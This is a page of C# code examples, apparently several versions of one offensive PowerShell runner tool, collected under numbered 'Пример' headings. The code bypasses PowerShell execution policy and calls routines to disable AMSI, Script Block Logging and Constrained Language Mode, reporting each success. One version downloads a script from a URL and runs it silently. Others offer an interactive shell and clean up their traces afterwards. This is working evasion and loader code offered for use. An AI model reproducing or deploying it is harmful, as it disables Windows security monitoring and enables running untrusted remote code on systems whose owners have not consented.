Пример #1
0
        private static string Execute(string scriptPath, string command)
        {
            string       output = "";
            CustomPSHost host   = new CustomPSHost();
            var          state  = InitialSessionState.CreateDefault();

            state.ApartmentState       = System.Threading.ApartmentState.STA;
            state.AuthorizationManager = null;                  // Bypasses PowerShell execution policy
            state.ThreadOptions        = PSThreadOptions.UseCurrentThread;

            using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
            {
                runspace.ApartmentState = System.Threading.ApartmentState.STA;
                runspace.ThreadOptions  = PSThreadOptions.UseCurrentThread;

                runspace.Open();

                using (var ps = PowerShell.Create())
                {
                    ps.Runspace = runspace;
                    if (!DisableDefenses(ps, host))
                    {
                        Info("[-] Could not disable all of the Powershell defenses.");
                        if (!ProgramOptions.Force)
                        {
                            Info("[-] Bailing out...");
                        }
                    }

                    string scriptContents = "";
                    if (scriptPath.Length > 0)
                    {
                        scriptContents = GetFileContents(scriptPath);

                        Info($"PS> . '{scriptPath}'");
                        output += ExecuteCommand(scriptContents, ps, host, false, false, false);

                        scriptContents            = "";
                        scriptPath                = "";
                        ProgramOptions.ScriptPath = "";
                    }

                    output += ExecuteCommand(command, ps, host, !ProgramOptions.CmdEncoded);
                    command = "";

                    if (!ProgramOptions.Nocleanup && CleanupNeeded)
                    {
                        DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
                    }
                    System.GC.Collect();
                }

                runspace.Close();
            }

            return(output.Trim());
        }
Пример #2
0
        private static void Parashell()
        {
            CustomPSHost host  = new CustomPSHost();
            var          state = InitialSessionState.CreateDefault();

            state.AuthorizationManager = null;                  // Bypasses PowerShell execution policy

            using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
            {
                runspace.Open();

                using (var ps = PowerShell.Create())
                {
                    ps.Runspace = runspace;
                    if (!DisableDefenses(ps, host))
                    {
                        Info("[-] Could not disable all of the Powershell defenses.");
                        if (!ProgramOptions.Force)
                        {
                            Info("[-] Bailing out...");
                            return;
                        }
                    }

                    string input;
                    while (true)
                    {
                        string pwd    = ExecuteCommand("(Resolve-Path .\\).Path", ps, host, true, true).Trim();
                        string prompt = $"{GLOBAL_PROMPT_PREFIX} {pwd}> ";
                        input = Input(prompt);

                        string output = ExecuteCommand(input, ps, host, true);
                        Console.WriteLine(output);

                        if (input == null || input.Length == 0 ||
                            String.Equals(input, "exit", StringComparison.CurrentCultureIgnoreCase) ||
                            String.Equals(input, "quit", StringComparison.CurrentCultureIgnoreCase))
                        {
                            break;
                        }

                        input = "";
                    }

                    if (!ProgramOptions.Nocleanup && CleanupNeeded)
                    {
                        DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
                    }
                }

                runspace.Close();
            }
        }
Пример #3
0
        private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
        {
            bool ret = true;

            ret &= DisableClm.DoDisable(rs);

            string l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true);

            Info($"[.] Language Mode: {l}");

            if (ret && String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
            {
                Info("[+] Constrained Language Mode Disabled.");
            }
            else
            {
                Info("[-] Constrained Language Mode not disabled.");
            }

            if ((ret &= DisableScriptLogging(rs)))
            {
                Info("[+] Script Block Logging Disabled.");
            }
            else
            {
                Info("[-] Script Block Logging not disabled.");
            }

            if ((ret &= DisableAmsi(rs)))
            {
                Info("[+] AMSI Disabled.");
            }
            else
            {
                Info("[-] AMSI not disabled.");
            }

            return(ret);
        }
Пример #4
0
        static void Main(string[] args)
        {
            if ((args.Length >= 1) && (String.Equals(args[0], "--help", StringComparison.CurrentCultureIgnoreCase) ||
                                       String.Equals(args[0], "/h", StringComparison.CurrentCultureIgnoreCase) ||
                                       String.Equals(args[0], "/?", StringComparison.CurrentCultureIgnoreCase) ||
                                       String.Equals(args[0], "-h", StringComparison.CurrentCultureIgnoreCase)))
            {
                Usage();
                return;
            }

            try
            {
                ProgramOptions = ParseOptions(args);
            }
            catch (ArgumentException e)
            {
                Console.WriteLine($"[-] Cannot parse arguments: {e.Message.ToString()}");
                Usage();
                return;
            }

            if (ProgramOptions.Verbose)
            {
                PrintBanner();
            }

            if (ProgramOptions.ScriptPath.Length > 0)
            {
                Info($"[.] Will load script file: '{ProgramOptions.ScriptPath}'");
            }
            else
            {
                //Info($"[-] It looks like no script path was given.");
            }

            if (ProgramOptions.XorKey != 0)
            {
                Info($"[.] Using decoding key: {ProgramOptions.XorKey}");
            }

            try
            {
                AppDomain dom = AppDomain.CreateDomain("sandbox");
                if (ProgramOptions.Parashell)
                {
                    Console.CancelKeyPress += (object sender, ConsoleCancelEventArgs e) =>
                    {
                        if (e.SpecialKey == ConsoleSpecialKey.ControlC)
                        {
                            e.Cancel = true;
                            Console.WriteLine("^C");
                        }
                    };

                    Parashell();
                }
                else
                {
                    string output = Execute(ProgramOptions.ScriptPath, ProgramOptions.Command);
                    if (output.Length > 0)
                    {
                        Console.WriteLine("\n" + output);
                    }
                }

                GC.Collect();
                GC.WaitForPendingFinalizers();
                GC.Collect();

                if (!ProgramOptions.Nocleanup && CleanupNeeded)
                {
                    DisableClm.Cleanup(null, null, ProgramOptions.Verbose);
                }
            }
            catch (Exception e)
            {
                Console.WriteLine($"[!] That's embarassing. Unhandled exception occured:\n{e}");
            }
        }
Пример #5
0
        private static string Execute(string scriptPath, string command)
        {
            string       output = "";
            CustomPSHost host   = new CustomPSHost();
            var          state  = InitialSessionState.CreateDefault();

            state.ApartmentState       = System.Threading.ApartmentState.STA;
            state.AuthorizationManager = null;                  // Bypasses PowerShell execution policy
            state.ThreadOptions        = PSThreadOptions.UseCurrentThread;

            using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
            {
                runspace.ApartmentState = System.Threading.ApartmentState.STA;
                runspace.ThreadOptions  = PSThreadOptions.UseCurrentThread;

                runspace.Open();

                using (var ps = PowerShell.Create())
                {
                    ps.Runspace = runspace;
                    if (!DisableDefenses(ps, host))
                    {
                        Info("[-] Could not disable all of the Powershell defenses.");
                        if (!ProgramOptions.Force)
                        {
                            Info("[-] Bailing out...");
                        }
                    }

                    if (scriptPath.Length > 0)
                    {
                        bool   success        = true;
                        string scriptContents = "";
                        bool   silent         = false;

                        try
                        {
                            if (scriptPath.StartsWith("http://") || scriptPath.StartsWith("https://"))
                            {
                                using (var wc = new System.Net.WebClient())
                                {
                                    scriptContents = wc.DownloadString(scriptPath);
                                }

                                silent = true;
                                Info($"Executing downloaded script file: {scriptPath}");
                            }
                            else
                            {
                                if (!File.Exists(scriptPath))
                                {
                                    throw new Exception($"Script file does not exist.Will not load it: '{scriptPath}'");
                                }

                                scriptContents = GetFileContents(scriptPath);
                                Info($"PS> . '{scriptPath}'");
                            }
                        }
                        catch (Exception e)
                        {
                            Info($"Could not fetch script file/URL contents. Exception: {e}");
                            success = false;
                        }

                        if (success && scriptContents.Length > 0)
                        {
                            output += ExecuteCommand(scriptContents, ps, host, false, silent, false);
                        }

                        scriptContents            = "";
                        scriptPath                = "";
                        ProgramOptions.ScriptPath = "";
                    }

                    output += ExecuteCommand(command, ps, host, !ProgramOptions.CmdEncoded);
                    command = "";

                    if (!ProgramOptions.Nocleanup && CleanupNeeded)
                    {
                        DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
                    }
                    System.GC.Collect();
                }

                runspace.Close();
            }

            return(output.Trim());
        }
Пример #6
0
        private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
        {
            bool ret = true;

            string l         = ExecuteCommand("'{0}.{1}' -f $PSVersionTable.PSVersion.Major, $PSVersionTable.PSVersion.Minor", rs, host, true, true).Trim();
            float  psversion = 5;

            try
            {
                System.Globalization.CultureInfo customCulture = (System.Globalization.CultureInfo)System.Threading.Thread.CurrentThread.CurrentCulture.Clone();
                customCulture.NumberFormat.NumberDecimalSeparator = ".";

                System.Threading.Thread.CurrentThread.CurrentCulture = customCulture;
                psversion = float.Parse(l, System.Globalization.CultureInfo.InvariantCulture);
            }
            catch (FormatException e)
            {
                Info($"[-] Could not obtain Powershell's version. Assuming 5.0 (exception: {e}");
            }

            if (psversion < 5.0 && !ProgramOptions.Force)
            {
                Info("[+] Powershell version is below 5, so AMSI, CLM, SBL are not available anyway :-)");
                Info("Skipping bypass procedures...");
                return(ret);
            }
            else
            {
                Info($"[.] Powershell's version: {psversion}");
            }

            l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
            Info($"[.] Language Mode: {l}");

            if (!String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
            {
                DisableClm.DoDisable(rs, host, ProgramOptions.Verbose);
                CleanupNeeded = true;

                l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
                Info($"[.] Language Mode after attempting to disable CLM: {l}");

                if (String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
                {
                    Info("[+] Constrained Language Mode Disabled.");
                    ret &= true;
                }
                else
                {
                    Info("[-] Constrained Language Mode not disabled.");
                    ret &= false;
                }
            }
            else
            {
                Info("[+] No need to disable Constrained Language Mode. Already in FullLanguage.");
            }

            if ((ret &= DisableScriptLogging(rs)))
            {
                Info("[+] Script Block Logging Disabled.");
            }
            else
            {
                Info("[-] Script Block Logging not disabled.");
            }

            if ((ret &= DisableAmsi(rs)))
            {
                Info("[+] AMSI Disabled.");
            }
            else
            {
                Info("[-] AMSI not disabled.");
            }

            Info("");

            return(ret);
        }